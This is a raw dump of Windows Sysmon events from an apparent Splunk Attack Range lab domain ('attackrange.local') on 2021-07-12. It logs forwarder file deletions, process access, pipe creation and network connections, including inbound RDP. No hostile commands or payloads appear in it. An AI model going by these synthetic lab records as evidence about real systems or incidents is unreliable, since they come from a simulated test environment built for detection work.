07:43:02.603{466BC892-02B0-60E8-1600-00000000CF01}130496C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:02.603{466BC892-02B0-60E8-1600-00000000CF01}130496C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:02.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A65526F1D9CF9A28DA4B095A029729,SHA256=F56CD861043555B3E7C659318EB17B618159C46B358D1B29E054C5675EBD32EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:01.365{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57139-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000805854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:02.341{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DFD9AB2CB3B6ECE4DA5C72B572BCF32,SHA256=BB3C030E2E39804D8E638FEEF84EFEEFF1175A4C1932EE176340B4C9F204D410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:03.357{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A1ABAEFFC96A68650E0EA748BDC4A66,SHA256=18CEB06B886F19FFF6002B9955E4843A0B1937668DC1FE480939862B5969C3DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:55.760{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50887-false10.0.1.12-8000- 23542300x80000000000000001045713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:03.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA80ACDA73F1BB5200163FF4D0C07E9,SHA256=802A1F404F17BDBED430FE98FCAE95D520B122A94A05A9389D9917B862AAA15C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:04.448{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A9EF820E3F469768F3F5F9B0FC51E99,SHA256=072E9D1FC614E41D5579AC3DB98D825E5132980AF13FF1D65DC94C76F205FE59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:04.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F4911455D4780CBC61BF69A31A10EB,SHA256=6921AEDED4C677903F2D0730683F77598DA2FCD41E8E7BFB643B125C4EC5C2DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:05.485{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=181EFCB068DF2EE990C960BC7F25A84C,SHA256=C54B86CA0AD121A3CD6D7647DE90E7B11126353A3044CB8AA2752D884D4BC032,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:05.419{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A77FA90244D5E34C0CE6115DCA83FED1,SHA256=33A6CEF33903C3905E4EE78DDD00F7A6538F245D58344225E86286FDB28B7A6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.549{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFCEE72B1D6707A6B801A9B489F1177A,SHA256=2BCEF3EA3D26CE27A23453B119B98AA7BE49A25194AC8E60F05E7F8304E7EE47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:06.435{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0326DE68F3EB6A924DE12AACD5D4E9FD,SHA256=3D55192FFBAB5F799191D4083A4BB7E43DEE0D8688685CDA4859500E03666F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.133{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:06.086{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001045719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.086{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla 
Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001045718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:43:06.081{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.370.54388881C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001045717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:43:06.081{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.370.54388881C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000805861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:06.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:06.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:06.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:07.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9BF1CAFC86DCAEEF98A1A3A18ED0FFD,SHA256=D1C26CE5FBC669C43EB494BC7BEC2953F1ADEEDE6EF51E6D848B91EF3B82132E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:07.466{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=238524D53B1D97BDD32CB1A074E485A7,SHA256=79691C30F01AE63CED8F1E733CD72E45268936F0D345A74F190BC2A013D109EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:08.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E809DA9EA6BCA39BC1FCD7624F629167,SHA256=E8BF3FCC5C9A1C103ED70E9A626182F39891160809A9C3A73474FA5D07E1AFCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:08.497{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C978DC6F8B6784C0390C85A044679A67,SHA256=E73F0415B8494775B93AB19D3AFAED75BFB9BC298A9B9C54403DA3562527554B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:09.615{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E7A6930EB11D2792C91AFB4D1EE1EA,SHA256=DA42CAE428C5AA385A17AAB71066F673BF67E3D3C7D00F0F3EEC8422F7977BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:09.544{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49F9AA072C9EE48BA09C919F8E31366,SHA256=8C387CC38AC323072CBED48F1B5185B7E8BC7AF5FBBA3E182889DED92BB66AC6,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000805866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:07.302{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57140-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000805865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:07.185{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com63375-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001045727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:10.617{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0B8FD60B6BCEFFAF17AED13BCDF50D4,SHA256=6A18DC49B1E50962E719A6DB06E63856EAF4167A873C39BD2ED4641F1438CA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:10.544{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B7B8D640E158B62F7265FCEF6E4345,SHA256=C49D6DE7C1BD1F709AD6EA4E0D2B396306FBEEBBFEEBDB839C78130B4FBBABE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:01.636{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50888-false10.0.1.12-8000- 23542300x80000000000000001045728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:11.632{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01DDE23B9D84E22FB786A16D8C26DFD7,SHA256=549B80970BF525A46AD7A5BF2C2E2C8F55C8CBE06C51D780E71DA1669A94A6D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:11.576{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CB34E3B0AF74F6CD867784F33D6BC70,SHA256=56D4346BD009447084396E1EF777B296280103CC950812D817600CF68438A907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:12.647{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B501697F5CBF24A3BBEEB99B2997AA1B,SHA256=59042F70EC4A6102DBEF9329744ECD83DE627AE3195444312093922BCD9D1742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:12.669{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74DB58B5B5441FA4F1013BA72D16252C,SHA256=BF711EA8112F468C361C3C213DF6FB6DA5F9CA36F52818403892FBFA2B407EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:12.669{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA8CF747067E94A6B097C93CA19E1E5C,SHA256=6E22D24792C6B9B569991FAD5BA972BEE28234EF787AFB9A96141A02738644E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:12.591{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8231541C5F16D8AE9A9BF1F77466D81E,SHA256=589EFAAD2C5B832ECB1DEE6B91C256341CAE9376310FCA89E8325083AD7B7566,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:05.209{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57141-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001045730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:13.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FE4BB5530409A42C9F427EECEDB58B1,SHA256=D2DB92C2BB8BD7E61BC3E506410E223EF1FD19B43ECF7E012929D2F45B7CBDC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:13.654{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B9B93FF00BCA284522C749F6707D89,SHA256=D08B04CC41A92BB78C497615E8716E413426D275AC5E2A9E0BEF2FABAED25050,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:11.500{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-31339-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001045733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50889-false10.0.1.12-8000- 23542300x80000000000000001045732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 